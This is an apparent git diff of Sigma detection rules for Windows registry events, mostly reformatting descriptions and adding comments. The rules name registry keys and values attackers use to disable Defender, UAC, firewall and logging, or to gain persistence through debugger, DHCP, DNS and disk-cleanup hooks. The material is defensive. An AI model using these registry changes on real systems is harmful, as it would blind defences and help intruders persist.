condition: registry_set and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml index bb3cbaa38..ea30f2357 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_creation_service_uncommon_folder.yml @@ -1,8 +1,7 @@ title: Service Binary in Uncommon Folder id: 277dc340-0540-42e7-8efb-5ff460045e07 status: experimental -description: Detect the creation of a service with a service binary located in a uncommon - directory +description: Detect the creation of a service with a service binary located in a uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: Florian Roth (Nextron Systems) @@ -26,9 +25,10 @@ detection: - \AppData\Local\ - \AppData\Roaming\ Details: - - DWORD (0x00000000) - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000000) # boot + - DWORD (0x00000001) # System + - DWORD (0x00000002) # Automatic + # 3 - Manual , 4 - Disabled selection_2: TargetObject|startswith: HKLM\System\CurrentControlSet\Services\ TargetObject|endswith: \ImagePath @@ -36,12 +36,12 @@ detection: - \AppData\Local\ - \AppData\Roaming\ filter: - - Image|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom - - Details|contains: - - \AppData\Roaming\Zoom - - \AppData\Local\Zoom + - Image|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom + - Details|contains: + - \AppData\Roaming\Zoom + - \AppData\Local\Zoom condition: registry_set and (1 of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml index 1ff075dab..606eeaf53 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml @@ -1,8 +1,7 @@ title: Suspicious New Printer Ports in Registry (CVE-2020-1048) id: 7ec912f2-5175-4868-b811-ec13ad0f8567 status: test -description: Detects a new and suspicious printer port creation in Registry that could - be an attempt to exploit CVE-2020-1048 +description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048 references: - https://windows-internals.com/printdemon-cve-2020-1048/ author: EagleEye Team, Florian Roth (Nextron Systems), NVISO diff --git a/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml b/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml index b29d1ca2a..fcb1facaa 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_cve_2022_30190_msdt_follina.yml @@ -1,8 +1,7 @@ title: Suspicious Set Value of MSDT in Registry (CVE-2022-30190) id: 2d9403d5-7927-46b7-8216-37ab7c9ec5e3 status: test -description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could - be an attempt to exploit CVE-2022-30190. +description: Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. references: - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190 - https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ diff --git a/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml index e281c2189..4ce622fc0 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dbgmanageddebugger_persistence.yml @@ -1,9 +1,7 @@ title: Potential Registry Persistence Attempt Via DbgManagedDebugger id: 9827ae57-3802-418f-994b-d5ecf5cd974b status: experimental -description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" - key in order to achieve persistence. Which will get invoked when an application - crashes +description: Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence. Which will get invoked when an application crashes references: - https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/ - https://github.com/last-byte/PersistenceSniper @@ -24,11 +22,9 @@ detection: selection: TargetObject|endswith: \Microsoft\.NETFramework\DbgManagedDebugger filter: - Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT - "%s" EVTHDL %d' + Details: '"C:\Windows\system32\vsjitdebugger.exe" PID %d APPDOM %d EXTEXT "%s" EVTHDL %d' condition: registry_set and (selection and not filter) falsepositives: - - Legitimate use of the key to setup a debugger. Which is often the case on developers - machines + - Legitimate use of the key to setup a debugger. Which is often the case on developers machines level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml b/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml index fadb7bf05..4c3ce7431 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_defender_exclusions.yml @@ -1,8 +1,8 @@ title: Windows Defender Exclusions Added - Registry id: a982fc9c-6333-4ffb-a51d-addb04e8b529 related: - - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f - type: derived + - id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f + type: derived status: test description: Detects the Setting of Windows Defender Exclusions references: diff --git a/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml b/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml index 99eb77f20..6e0987021 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_desktop_background_change.yml @@ -1,16 +1,12 @@ title: Potentially Suspicious Desktop Background Change Via Registry id: 85b88e05-dadc-430b-8a9e-53ff1cd30aae related: - - id: 8cbc9475-8d05-4e27-9c32-df960716c701 - type: similar + - id: 8cbc9475-8d05-4e27-9c32-df960716c701 + type: similar status: experimental -description: 'Detects regsitry value settings that would replace the user''s desktop - background. - - This is a common technique used by malware to change the desktop background to - a ransom note or other image. - - ' +description: | + Detects regsitry value settings that would replace the user's desktop background. + This is a common technique used by malware to change the desktop background to a ransom note or other image. references: - https://www.attackiq.com/2023/09/20/emulating-rhysida/ - https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/ @@ -40,18 +36,17 @@ detection: - CurrentVersion\Policies\System selection_values_1: TargetObject|endswith: NoChangingWallpaper - Details: DWORD (0x00000001) + Details: DWORD (0x00000001) # Prevent changing desktop background selection_values_2: TargetObject|endswith: \Wallpaper selection_values_3: TargetObject|endswith: \WallpaperStyle - Details: '2' + Details: '2' # Stretch filter_main_svchost: + # Note: Excluding GPO changes Image|endswith: \svchost.exe - condition: registry_set and (selection_keys and 1 of selection_values_* and not - 1 of filter_main_*) + condition: registry_set and (selection_keys and 1 of selection_values_* and not 1 of filter_main_*) falsepositives: - - Administrative scripts that change the desktop background to a company logo - or other image. + - Administrative scripts that change the desktop background to a company logo or other image. level: medium ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml b/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml index 959c9842e..209cb40f6 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_deviceguard_hypervisorenforcedcodeintegrity_disabled.yml @@ -1,10 +1,7 @@ title: Hypervisor Enforced Code Integrity Disabled id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a status: experimental -description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and - the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced - Code Integrity feature. This allows an attacker to load unsigned and untrusted - code to be run in the kernel +description: Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code to be run in the kernel references: - https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/ - https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci @@ -23,7 +20,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - EventType: SetValue + EventType: SetValue TargetObject|endswith: - \Microsoft\Windows\DeviceGuard\HypervisorEnforcedCodeIntegrity - \Control\DeviceGuard\HypervisorEnforcedCodeIntegrity diff --git a/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml b/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml index a4e9bff84..8ae0b3784 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dhcp_calloutdll.yml @@ -1,9 +1,7 @@ title: DHCP Callout DLL Installation id: 9d3436ef-9476-4c43-acca-90ce06bdf33a status: test -description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled - parameter in Registry, which can be used to execute code in context of the DHCP - server (restart required) +description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required) references: - https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html - https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml index ccf7272a6..46fb13354 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_administrative_share.yml @@ -1,9 +1,7 @@ title: Disable Administrative Share Creation at Startup id: c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e status: test -description: Administrative shares are hidden network shares created by Microsoft - Windows NT operating systems that grant system administrators remote access to - every disk volume on a network-connected system +description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml index 77eeaa8f2..f5706c11c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -1,8 +1,7 @@ title: Potential AutoLogger Sessions Tampering id: f37b4bce-49d0-4087-9f5b-58bffda77316 status: experimental -description: Detects tampering with autologger trace sessions which is a technique - used by attackers to disable logging +description: Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ @@ -23,7 +22,7 @@ detection: selection_main: TargetObject|contains: \System\CurrentControlSet\Control\WMI\Autologger\ selection_values: - TargetObject|contains: + TargetObject|contains: # We only care about some autologger to avoid FP. Add more if you need - \EventLog- - \Defender TargetObject|endswith: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml index 9ef76345b..5d628ff2a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_defender_firewall.yml @@ -1,8 +1,7 @@ title: Disable Microsoft Defender Firewall via Registry id: 974515da-6cc5-4c95-ae65-f97f9150ec7f status: test -description: Adversaries may disable or modify system firewalls in order to bypass - controls limiting network usage +description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry author: frack113 @@ -20,6 +19,9 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall + # HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall TargetObject|startswith: HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\ TargetObject|endswith: \EnableFirewall Details: DWORD (0x00000000) diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml index 3bee9c1fa..4a5b28784 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_function_user.yml @@ -1,8 +1,7 @@ title: Disable Internal Tools or Feature in Registry id: e2482f8d-3443-4237-b906-cc145d87a076 status: experimental -description: Detects registry modifications that change features of internal Windows - tools (malware like Agent Tesla uses this technique) +description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md - https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml index ec32958fa..647d83c7e 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_macroruntimescanscope.yml @@ -1,7 +1,6 @@ title: Disable Macro Runtime Scan Scope id: ab871450-37dc-4a3a-997f-6662aa8ae0f1 -description: Detects tampering with the MacroRuntimeScanScope registry key to disable - runtime scanning of enabled macros +description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros status: experimental date: 2022/10/25 modified: 2023/08/17 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml index 52fdbe02e..966a23d58 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_security_center_notifications.yml @@ -1,8 +1,7 @@ title: Disable Windows Security Center Notifications id: 3ae1a046-f7db-439d-b7ce-b8b366b81fa6 status: experimental -description: Detect set UseActionCenterExperience to 0 to disable the Windows security - center notification +description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml index f24dd2a11..be3e4da4c 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_system_restore.yml @@ -1,8 +1,7 @@ title: Registry Disable System Restore id: 5de03871-5d46-4539-a82d-3aa992a69a83 status: experimental -description: Detects the modification of the registry to disable a system restore - on the computer +description: Detects the modification of the registry to disable a system restore on the computer references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml index 1d0de0a8e..551d6013a 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_uac_registry.yml @@ -1,9 +1,7 @@ title: Disable UAC Using Registry id: 48437c39-9e5f-47fb-af95-3d663c3f2919 status: experimental -description: Detects when an attacker tries to disable User Account Control (UAC) - by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA - from 1 to 0 +description: Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0 references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml index 2333c7733..16fd551ff 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_windows_defender_service.yml @@ -1,12 +1,11 @@ title: Windows Defender Service Disabled id: e1aa95de-610a-427d-b9e7-9b46cfafbe6a status: experimental -description: Detects when an attacker or tool disables the Windows Defender service - (WinDefend) via the registry +description: Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry references: - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 -author: "J\xE1n Tren\u010Dansk\xFD, frack113, AlertIQ, Nasreddine Bencherchali" +author: Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali date: 2022/08/01 modified: 2023/08/17 tags: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml b/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml index a8b4ef9c8..295f550ec 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -1,8 +1,7 @@ title: Disable Windows Event Logging Via Registry id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 status: experimental -description: Detects tampering with the "Enabled" registry key in order to disable - Windows logging of a Windows event channel +description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 - https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp @@ -25,10 +24,10 @@ detection: TargetObject|endswith: \Enabled Details: DWORD (0x00000000) filter_main_wevutil: - Image|endswith: \Windows\system32\wevtutil.exe + Image|endswith: \Windows\system32\wevtutil.exe # FP generated during installation of manifests via wevtutil filter_main_iis: Image|startswith: C:\Windows\winsxs\ - Image|endswith: \TiWorker.exe + Image|endswith: \TiWorker.exe # Many different TargetObjects filter_main_svchost: Image: C:\Windows\System32\svchost.exe TargetObject|contains: @@ -40,14 +39,12 @@ detection: filter_main_trusted_installer: Image: C:\Windows\servicing\TrustedInstaller.exe TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Compat-Appraiser - filter_optional_empty: + filter_optional_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: '' - filter_optional_null: - Image: null - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + filter_optional_null: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later + Image: + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Rare falsepositives may occur from legitimate administrators disabling specific - event log for troubleshooting + - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml index b6eebea3f..677601222 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml @@ -19,8 +19,7 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security - Center\App and Browser protection\DisallowExploitProtectionOverride + TargetObject|contains: SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride Details: DWORD (00000001) condition: registry_set and selection falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml index 2ce54d1df..09921a15f 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml @@ -1,8 +1,7 @@ title: Disabled Windows Defender Eventlog id: fcddca7c-b9c0-4ddf-98da-e1e2d18b0157 status: experimental -description: Detects the disabling of the Windows Defender eventlog as seen in relation - to Lockbit 3.0 infections +description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections references: - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 author: Florian Roth (Nextron Systems) @@ -20,12 +19,10 @@ detection: EventID: 13 Channel: Microsoft-Windows-Sysmon/Operational selection: - TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows - Defender/Operational\Enabled + TargetObject|contains: \Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational\Enabled Details: DWORD (0x00000000) condition: registry_set and selection falsepositives: - - Other Antivirus software installations could cause Windows to disable that eventlog - (unknown) + - Other Antivirus software installations could cause Windows to disable that eventlog (unknown) level: high ruletype: Sigma diff --git a/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml b/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml index 272b9faf9..d719480a4 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disabled_tamper_protection_on_microsoft_defender.yml @@ -21,10 +21,10 @@ detection: selection: TargetObject|contains: \Microsoft\Windows Defender\Features\TamperProtection Details: DWORD (0x00000000) - filter_msmpeng_client: + filter_msmpeng_client: # only disabled temporarily during updates Image|startswith: C:\ProgramData\Microsoft\Windows Defender\Platform\ Image|endswith: \MsMpEng.exe - filter_msmpeng_domain_controller: + filter_msmpeng_domain_controller: # only disabled temporarily during updates Image: C:\Program Files\Windows Defender\MsMpEng.exe condition: registry_set and (selection and not 1 of filter_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml b/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml index 71b31605f..3d73dcd37 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disallowrun_execution.yml @@ -1,8 +1,7 @@ title: Add DisallowRun Execution to Registry id: 275641a5-a492-45e2-a817-7c81e9d9d3e9 status: experimental -description: Detect set DisallowRun to 1 to prevent user running specific computer - program +description: Detect set DisallowRun to 1 to prevent user running specific computer program references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md author: frack113 diff --git a/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml index 7db505ef8..a4c5b40dc 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml @@ -1,16 +1,13 @@ title: Persistence Via Disk Cleanup Handler - Autorun id: d4e2745c-f0c6-4bde-a3ab-b553b3f693cc status: experimental -description: "Detects when an attacker modifies values of the Disk Cleanup Handler\ - \ in the registry to achieve persistence via autorun.\nThe disk cleanup manager\ - \ is part of the operating system.\nIt displays the dialog box [\u2026] The user\ - \ has the option of enabling or disabling individual handlers by selecting or\ - \ clearing their check box in the disk cleanup manager's UI.\nAlthough Windows\ - \ comes with a number of disk cleanup handlers, they aren't designed to handle\ - \ files produced by other applications.\nInstead, the disk cleanup manager is\ - \ designed to be flexible and extensible by enabling any developer to implement\ - \ and register their own disk cleanup handler.\nAny developer can extend the available\ - \ disk cleanup services by implementing and registering a disk cleanup handler.\n" +description: | + Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun. + The disk cleanup manager is part of the operating system. + It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI. + Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications. + Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. + Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler. references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ @@ -30,6 +27,7 @@ detection: root: TargetObject|contains: \SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\ selection_autorun: + # Launching PreCleanupString / CleanupString programs w/o gui, i.e. while using e.g. /autoclean TargetObject|contains: \Autorun Details: DWORD (0x00000001) selection_pre_after: @@ -37,6 +35,7 @@ detection: - \CleanupString - \PreCleanupString Details|contains: + # Add more as you see fit - cmd - powershell - rundll32 diff --git a/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml b/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml index e4e74ccd5..fa472e1c1 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dns_over_https_enabled.yml @@ -1,15 +1,10 @@ title: DNS-over-HTTPS Enabled by Registry id: 04b45a8a-d11d-49e4-9acc-4a1b524407a5 status: test -description: 'Detects when a user enables DNS-over-HTTPS. - - This can be used to hide internet activity or be used to hide the process of exfiltrating - data. - - With this enabled organization will lose visibility into data such as query type, - response and originating IP that are used to determine bad actors. - - ' +description: | + Detects when a user enables DNS-over-HTTPS. + This can be used to hide internet activity or be used to hide the process of exfiltrating data. + With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors. references: - https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html - https://github.com/elastic/detection-rules/issues/1371 diff --git a/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml b/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml index 1c46999fa..c1e1b5832 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml @@ -1,14 +1,12 @@ title: New DNS ServerLevelPluginDll Installed id: e61e8a88-59a9-451c-874e-70fcc9740d67 related: - - id: cbe51394-cd93-4473-b555-edf0144952d9 - type: derived - - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 - type: derived + - id: cbe51394-cd93-4473-b555-edf0144952d9 + type: derived + - id: f63b56ee-3f79-4b8a-97fb-5c48007e8573 + type: derived status: experimental -description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll - parameter in registry, which can be used to execute code in context of the DNS - server (restart required) +description: Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html diff --git a/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml b/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml index 0bc595a47..87379c9da 100644 --- a/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml +++ b/sigma/sysmon/registry/registry_set/registry_set_dot_net_etw_tamper.yml @@ -1,8 +1,8 @@ title: ETW Logging Disabled In .NET Processes - Sysmon Registry id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 related: - - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc - type: similar + - id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc + type: similar status: test description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. references: @@ -40,7 +40,7 @@ detection: - \COMPlus_ETWEnabled - \COMPlus_ETWFlags Details: - - 0 + - 0 # For REG_SZ type - DWORD (0x00000000) condition: registry_set and (1 of selection_*) falsepositives: diff --git a/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml b/sigma/sysmon/registry/registry_set/registry_set_enabling_cor_profiler_env_variables.yml index 120fd5270..73ddc702e 100644 --- 